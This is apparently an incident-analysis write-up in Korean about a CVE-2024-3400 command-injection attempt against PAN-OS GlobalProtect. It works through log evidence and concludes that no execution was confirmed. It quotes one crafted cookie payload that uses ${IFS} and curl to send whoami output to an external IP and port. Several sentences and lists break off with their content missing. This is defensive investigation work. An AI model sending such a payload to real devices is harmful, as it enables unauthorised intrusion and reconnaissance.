
PAN-OS CVE-2024-3400 명령 주입 시도 조사, 로그 증거를 기반으로 페이로드 전달, 내부 처리 및 실행 검증 분석
이 프로젝트는 PAN-OS GlobalProtect 서비스를 대상으로 한 CVE-2024-3400 명령 삽입 시도에 대한 조사를 문서화합니다.
목표는 다음을 확인하는 것입니다:
가능한 악용 시도를 나타내는 중요 알림이 트리거되었습니다.

요청에는 조작된 쿠키가 포함되어 있습니다:
SESSID=... curl${IFS}144.172.79.92:4444?user=$(whoami)

${IFS}는 공백 필터링을 우회합니다whoami는 시스템 식별 정보를 얻으려 시도합니다curl은 외부 통신을 시도합니다이는 명령 삽입 페이로드입니다
Nginx 로그는 요청이 서버에 도달했음을 확인합니다:
POST /global-protect/login.esp HTTP 200 User-Agent: curl

악성 요청이 수락되어 처리되었습니다.
시스템 로그는 페이로드가 내부 로직에 도달했음을 보여줍니다:

dt_curl)에 포함되었습니다하지만:
DNS 조회 실패 → 외부 통신 실패
공격 IP:

이는 외부 공격자 출처를 확인합니다.
공격 전에 여러 IP가 시스템과 상호작용했습니다:

144.172.79.92만이 익스플로잇에 직접 연결됩니다.
이는 실제 명령 삽입 시도였습니다.
공격자는 다음을 성공적으로 수행했습니다:
하지만:
확인된 명령 실행 또는 시스템 침해는 없습니다
명령 삽입 시도 페이로드 처리됨 - 실행 또는 영향 확인되지 않음